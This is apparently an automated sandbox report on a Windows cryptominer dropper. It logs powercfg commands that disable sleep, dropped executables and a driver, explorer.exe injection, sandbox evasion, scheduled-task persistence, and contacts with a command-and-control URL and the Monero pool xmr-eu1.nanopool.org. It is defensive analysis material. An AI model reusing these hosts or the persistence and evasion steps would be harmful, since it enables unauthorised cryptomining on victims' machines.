              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
              Windows Management Instrumentation              		1
              Windows Service              		1
              Windows Service              		1
              Masquerading              		OS Credential Dumping331
              Security Software Discovery              		Remote ServicesData from Local System1
              Non-Standard Port              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		212
              Process Injection              		1
              Disable or Modify Tools              		LSASS Memory2
              Process Discovery              		Remote Desktop ProtocolData from Removable Media2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading              		1
              Scheduled Task/Job              		151
              Virtualization/Sandbox Evasion              		Security Account Manager151
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading              		212
              Process Injection              		NTDS2
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information              		LSA Secrets33
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1411192 Sample: ft1i6jvAdD.exe Startdate: 18/03/2024 Architecture: WINDOWS Score: 100 83 xmr-eu1.nanopool.org 2->83 85 cf-protected-l7.com 2->85 93 Snort IDS alert for network traffic 2->93 95 Multi AV Scanner detection for submitted file 2->95 97 Yara detected Xmrig cryptocurrency miner 2->97 101 3 other signatures 2->101 9 ft1i6jvAdD.exe 3 2->9         started        12 fgfdgd.exe 1 2->12         started        15 fgfdgd.exe 1 2->15         started        17 3 other processes 2->17 signatures3 99 DNS related to crypt mining pools 83->99 process4 file5 81 C:\Users\user\AppData\Local\...\ghghghg.exe, PE32+ 9->81 dropped 19 ghghghg.exe 1 9->19         started        23 cmd.exe 2 9->23         started        31 2 other processes 9->31 121 Multi AV Scanner detection for dropped file 12->121 123 Machine Learning detection for dropped file 12->123 25 ghghghg.exe 12->25         started        33 3 other processes 12->33 27 ghghghg.exe 15->27         started        35 3 other processes 15->35 29 ghghghg.exe 17->29         started        37 5 other processes 17->37 signatures6 process7 file8 77 C:\Users\user\AppData\...\haaczrnyavrj.sys, PE32+ 19->77 dropped 103 Injects code into the Windows Explorer (explorer.exe) 19->103 105 Uses powercfg.exe to modify the power settings 19->105 107 Modifies the context of a thread in another process (thread injection) 19->107 109 Sample is not signed and drops a device driver 19->109 41 5 other processes 19->41 111 Uses schtasks.exe or at.exe to add and modify task schedules 23->111 39 conhost.exe 23->39         started        113 Modifies power options to not sleep / hibernate 25->113 45 4 other processes 25->45 47 4 other processes 27->47 49 4 other processes 29->49 79 C:\Users\user\AppData\Roaming\...\fgfdgd.exe, PE32+ 31->79 dropped 51 3 other processes 31->51 53 4 other processes 33->53 55 4 other processes 35->55 57 4 other processes 37->57 signatures9 process10 dnsIp11 87 54.37.137.114, 10300, 49730 OVHFR France 41->87 89 162.19.224.121, 10300, 49709 CENTURYLINK-US-LEGACY-QWESTUS United States 41->89 91 cf-protected-l7.com 134.255.231.136, 49710, 49723, 49726 ACTIVE-SERVERSactive-serverscomDE Germany 41->91 115 Query firmware table information (likely to detect VMs) 41->115 117 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 41->117 59 conhost.exe 41->59         started        61 conhost.exe 41->61         started        63 conhost.exe 41->63         started        65 conhost.exe 41->65         started        67 conhost.exe 45->67         started        69 conhost.exe 45->69         started        71 2 other processes 45->71 73 4 other processes 47->73 75 4 other processes 49->75 signatures12 119 Detected Stratum mining protocol 89->119 process13

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              ft1i6jvAdD.exe55%ReversingLabsByteCode-MSIL.Trojan.Heracles
              ft1i6jvAdD.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys5%ReversingLabs
              C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe55%ReversingLabsByteCode-MSIL.Trojan.Heracles

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://cf-protected-l7.com/api/endpoint.phpU0%Avira URL Cloudsafe
              http://cf-protected-l7.com/api/endpoint.phpe$U0%Avira URL Cloudsafe
              http://cf-protected-l7.com/api/endpoint.php--cinit-version=3.4.0--cinit-idle-wait=1--cinit-idle-cpu=0%Avira URL Cloudsafe
              http://cf-protected-l7.com/api/endpoint.phptmsnnprpbvnfzokr0%Avira URL Cloudsafe
              http://cf-protected-l7.com/api/endpoint.php0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cf-protected-l7.com
              		134.255.231.136
              		truetrue
                		unknown
                xmr-eu1.nanopool.org
                		141.94.23.83
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://cf-protected-l7.com/api/endpoint.phptrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://cf-protected-l7.com/api/endpoint.phpe$Uexplorer.exe, 00000011.00000003.3273815403.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://cf-protected-l7.com/api/endpoint.phpUexplorer.exe, 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://cf-protected-l7.com/api/endpoint.phptmsnnprpbvnfzokrexplorer.exe, 00000011.00000003.2347665199.0000000001421000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://cf-protected-l7.com/api/endpoint.php--cinit-version=3.4.0--cinit-idle-wait=1--cinit-idle-cpu=explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  134.255.231.136
                  		cf-protected-l7.comGermany
                  		197071ACTIVE-SERVERSactive-serverscomDEtrue
                  162.19.224.121
                  		unknownUnited States
                  		209CENTURYLINK-US-LEGACY-QWESTUStrue
                  54.37.137.114
                  		unknownFrance
                  		16276OVHFRtrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1411192
                  Start date and time:2024-03-18 17:47:15 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 11m 27s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:83
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:ft1i6jvAdD.exe
                  renamed because original name is a hash value
                  Original Sample Name:b03c2d7df7eabc44f36397cb66ac3e77.exe
                  Detection:MAL
                  Classification:mal100.spyw.evad.mine.winEXE@117/4@2/3
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 88%
                  • Number of executed functions: 126
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                  • Excluded IPs from analysis (whitelisted): 40.127.169.103, 23.206.121.21, 23.206.121.58, 23.206.121.13, 23.206.121.22, 23.206.121.53, 23.206.121.20, 23.206.121.46, 13.85.23.206
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                  • Execution Graph export aborted for target fgfdgd.exe, PID 1668 because it is empty
                  • Execution Graph export aborted for target fgfdgd.exe, PID 1828 because it is empty
                  • Execution Graph export aborted for target fgfdgd.exe, PID 3760 because it is empty
                  • Execution Graph export aborted for target fgfdgd.exe, PID 6784 because it is empty
                  • Execution Graph export aborted for target ft1i6jvAdD.exe, PID 7032 because it is empty
                  • Execution Graph export aborted for target ghghghg.exe, PID 1716 because it is empty
                  • Execution Graph export aborted for target ghghghg.exe, PID 1800 because it is empty
                  • Execution Graph export aborted for target ghghghg.exe, PID 6212 because it is empty
                  • Execution Graph export aborted for target ghghghg.exe, PID 6244 because it is empty
                  • Execution Graph export aborted for target ghghghg.exe, PID 7132 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: ft1i6jvAdD.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  17:48:12API Interceptor5x Sleep call for process: ghghghg.exe modified
                  17:48:13Task SchedulerRun new task: Nafifas path: "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe"

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  xmr-eu1.nanopool.orgvS3C07uH19.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, XmrigBrowse
                  • 51.255.34.118
                  kGsmMpk9kX.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, XmrigBrowse
                  • 51.68.190.80
                  huUaO72kiE.exeGet hashmaliciousXmrig, zgRATBrowse
                  • 51.15.58.224
                  O1GEDfxZO0.exeGet hashmaliciouszgRATBrowse
                  • 212.47.253.124
                  obaTzlGNzi.exeGet hashmaliciousXmrig, zgRATBrowse
                  • 163.172.154.142
                  8EbwkHzF0i.exeGet hashmaliciousXmrig, zgRATBrowse
                  • 163.172.154.142
                  qZTW6BQiPB.exeGet hashmaliciousGlupteba, LummaC Stealer, RedLine, SmokeLoader, XWorm, Xmrig, zgRATBrowse
                  • 163.172.154.142
                  y2SXPxk5wh.exeGet hashmaliciousGlupteba, LummaC Stealer, RedLine, SmokeLoader, XWorm, Xmrig, zgRATBrowse
                  • 163.172.154.142
                  gWASDCKtct.exeGet hashmaliciousGlupteba, LummaC Stealer, RedLine, SmokeLoader, XWorm, Xmrig, zgRATBrowse
                  • 51.68.190.80

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CENTURYLINK-US-LEGACY-QWESTUS5dm0sjynSD.elfGet hashmaliciousUnknownBrowse
                  • 65.130.12.233
                  bzVCvtoyIt.elfGet hashmaliciousMiraiBrowse
                  • 162.19.122.107
                  7p4wRYn0OK.elfGet hashmaliciousMiraiBrowse
                  • 146.206.160.239
                  FoDoFx0t5a.elfGet hashmaliciousMiraiBrowse
                  • 67.5.191.142
                  LhypGRxeG7.elfGet hashmaliciousUnknownBrowse
                  • 97.119.231.192
                  uPG4ESUjG9.elfGet hashmaliciousMiraiBrowse
                  • 67.129.210.111
                  WdwgE9p1kA.elfGet hashmaliciousMiraiBrowse
                  • 75.120.122.12
                  ZSlkj38Qce.elfGet hashmaliciousMiraiBrowse
                  • 71.49.186.253
                  kt46zhUGCl.elfGet hashmaliciousMiraiBrowse
                  • 184.97.138.118
                  KtvCSGVXFf.elfGet hashmaliciousMiraiBrowse
                  • 71.52.208.252
                  ACTIVE-SERVERSactive-serverscomDEhuhu.mips.elfGet hashmaliciousMirai, OkiruBrowse
                  • 95.156.228.183
                  1B8943B2CCEA3EE9E464B5865711DB721BAE33CA03646.exeGet hashmaliciousBazaLoader, SmokeLoaderBrowse
                  • 134.255.232.95
                  Summaryform_XsssmAVjTv.wsfGet hashmaliciousAsyncRAT, zgRATBrowse
                  • 134.255.225.46
                  http://vps-zap756882-1.zap-srv.comGet hashmaliciousUnknownBrowse
                  • 134.255.234.208
                  3fB3EuUEe7.exeGet hashmaliciousQuasarBrowse
                  • 134.255.254.225
                  dl2.exeGet hashmaliciousUnknownBrowse
                  • 31.214.240.203
                  mpsl.elfGet hashmaliciousMiraiBrowse
                  • 95.156.228.199
                  KY40Vey3Ml.elfGet hashmaliciousMiraiBrowse
                  • 95.156.228.196
                  file.exeGet hashmaliciousQuasarBrowse
                  • 134.255.254.134
                  dulcifiesSootyi.jsGet hashmaliciousUnknownBrowse
                  • 134.255.220.213
                  OVHFRBagskrmes.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 46.105.60.70
                  8B5NOWiWn8.elfGet hashmaliciousUnknownBrowse
                  • 51.255.248.67
                  7InjeWQVHC.elfGet hashmaliciousUnknownBrowse
                  • 37.59.96.132
                  TRANSFERENCIA.exeGet hashmaliciousAgentTeslaBrowse
                  • 178.33.114.182
                  xdd6BRIg0O.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                  • 51.38.247.67
                  WdwgE9p1kA.elfGet hashmaliciousMiraiBrowse
                  • 192.99.154.26
                  ry3HbSIIPt.elfGet hashmaliciousMiraiBrowse
                  • 192.99.207.204
                  PPIQY37OuD.elfGet hashmaliciousUnknownBrowse
                  • 51.222.237.219
                  Vindegade.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 46.105.60.70
                  1PfkUPbqjw.elfGet hashmaliciousMiraiBrowse
                  • 198.50.131.212

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sysSetup.exeGet hashmaliciousLummaC, PureLog Stealer, XmrigBrowse
                    SU8Kw3AYnG.exeGet hashmaliciousUnknownBrowse
                      AQrfgZUJcl.exeGet hashmaliciousXmrigBrowse
                        6oD5NFvQdZ.exeGet hashmaliciousUnknownBrowse
                          6oD5NFvQdZ.exeGet hashmaliciousUnknownBrowse
                            eeZJsTqr0S.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                              MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zipGet hashmaliciousXmrigBrowse
                                jeNQRsRgBe.exeGet hashmaliciousXmrigBrowse
                                  RemiTool v2.exeGet hashmaliciousXmrigBrowse
                                    SecuriteInfo.com.Trojan.Siggen27.16296.12545.31206.exeGet hashmaliciousXmrigBrowse

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Temp\ghghghg.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\ft1i6jvAdD.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):5191680
                                      Entropy (8bit):6.515611126076874
                                      Encrypted:false
                                      SSDEEP:98304:jJDFg13oa/r8FiubBAzKkEUous3o6CUF5T2/TGhzmZTU:Xgu/subSzKlJe/ULQ2q
                                      MD5:D3CD8232D7097DC4953B61B86AFD7FD2
                                      SHA1:E1733674BC7C3C7AA5B156B66049DBFD3191BD11
                                      SHA-256:6FD8206D1F38AC41C23A6C9DEAD21EB3FF7421200F6185EDF63C70DA8FBB398C
                                      SHA-512:2404A989B0D400D621056E7326D465C6A5646CAC175920D0CB9BC2E7C0AA6D5B08996C42DB963C2B5E5C7D14814616986D985A15F3EA1D84F4CA23720FF1E95C
                                      Malicious:true
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......^....N.....@..........@..............................O...........`.................................................`...<............PO.t.............O.x............................p..(....t..8...............X............................text...F].......^.................. ..`.rdata.......p.......b..............@..@.data.....N.......N.................@....pdata..t....PO......0O.............@..@.00cfg.......`O......2O.............@..@.tls.........pO......4O.............@....reloc..x.....O......6O.............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\ghghghg.exe
                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):14544
                                      Entropy (8bit):6.2660301556221185
                                      Encrypted:false
                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 5%
                                      Joe Sandbox View:
                                      • Filename: Setup.exe, Detection: malicious, Browse
                                      • Filename: SU8Kw3AYnG.exe, Detection: malicious, Browse
                                      • Filename: AQrfgZUJcl.exe, Detection: malicious, Browse
                                      • Filename: 6oD5NFvQdZ.exe, Detection: malicious, Browse
                                      • Filename: 6oD5NFvQdZ.exe, Detection: malicious, Browse
                                      • Filename: eeZJsTqr0S.exe, Detection: malicious, Browse
                                      • Filename: MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip, Detection: malicious, Browse
                                      • Filename: jeNQRsRgBe.exe, Detection: malicious, Browse
                                      • Filename: RemiTool v2.exe, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.Trojan.Siggen27.16296.12545.31206.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe

                                      Download File
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):5227008
                                      Entropy (8bit):7.999295125679926
                                      Encrypted:true
                                      SSDEEP:98304:22gWGh4M2YYF05TqTcAJ5ubzxFAvJWJkC0dLM658jmpMJAxmEjmiFDzQbTMo7KlJ:22gWGh4M2nF0pqTcA/gFonCu0SmEDFD5
                                      MD5:B03C2D7DF7EABC44F36397CB66AC3E77
                                      SHA1:486F521D16D96878A74FF9212CF2DA5B184E0430
                                      SHA-256:4489FF33E7A91C7485A1C1DD8A6102868E385F74FD8B5DBDBF4B505BBE9193B3
                                      SHA-512:5CFFC7A0BA01E5DB793A62A3FC1DC2454CBD5B768F66959ADAC11E1523958BC48EF4C1DD5FF074988C04B6269853671AB480074A117D30184631D9936C154051
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 55%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...7..e..........".......O.............. ....@...... ........................P...........@...........................................................O.............................................................................................. ..H............text...6.O.. ....O................. ..`.rsrc.........O.......O.............@..@........................................H........K..LM......g...P....?O...........................................(i...*..(i...*..(i...*..(i...*..(i...*..(i...*..(i...*..(i...*..(i...*..(i...*..(i...*..(i...*>+......*si...+...(i...*..(i...*..(i...*..(i...*..(i...*..(i...*..(i...*r.~.... ....(r...}.....(i...*...b.....+.+.*(7...+.(w...+.....0..@.......8....~.... ....8....~.... ....8....(U...sj....ok.....~.... "...(r...~.... ....(r...(U...ol.....~.... C...(r... ....om.........(7...~.... `...(r...~.... ....(r...(U...(n.....oo.

                                      C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe:Zone.Identifier

                                      Download File
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:false
                                      Preview:[ZoneTransfer]....ZoneId=0

                                      Static File Info

                                      General

                                      File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.999295125679926
                                      TrID:
                                      • Win64 Executable GUI (202006/5) 92.65%
                                      • Win64 Executable (generic) (12005/4) 5.51%
                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                      • DOS Executable Generic (2002/1) 0.92%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:ft1i6jvAdD.exe
                                      File size:5'227'008 bytes
                                      MD5:b03c2d7df7eabc44f36397cb66ac3e77
                                      SHA1:486f521d16d96878a74ff9212cf2da5b184e0430
                                      SHA256:4489ff33e7a91c7485a1c1dd8a6102868e385f74fd8b5dbdbf4b505bbe9193b3
                                      SHA512:5cffc7a0ba01e5db793a62a3fc1dc2454cbd5b768f66959adac11e1523958bc48ef4c1dd5ff074988c04b6269853671ab480074a117d30184631d9936c154051
                                      SSDEEP:98304:22gWGh4M2YYF05TqTcAJ5ubzxFAvJWJkC0dLM658jmpMJAxmEjmiFDzQbTMo7KlJ:22gWGh4M2nF0pqTcA/gFonCu0SmEDFD5
                                      TLSH:803633982FA0C7ECC68D04B482536A555330F4E165A0EF4CE9168D8E4D527FDE3ABBD8
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...7..e..........".......O.............. ....@...... ........................P...........@................................

                                      File Icon

                                      Icon Hash:00928e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x400000
                                      Entrypoint Section:
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x65F38237 [Thu Mar 14 23:03:19 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:

                                      Entrypoint Preview

                                      Instruction
                                      dec ebp
                                      pop edx
                                      nop
                                      add byte ptr [ebx], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax+eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x4fe0000x4be.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000x4fb8360x4fba00dd58249a90b9d4a9dc3f21476c0a8f8aunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0x4fe0000x4be0x6009708c20db4bfb475ebe5e623e4c938bbFalse0.3873697916666667data3.8186402896367726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
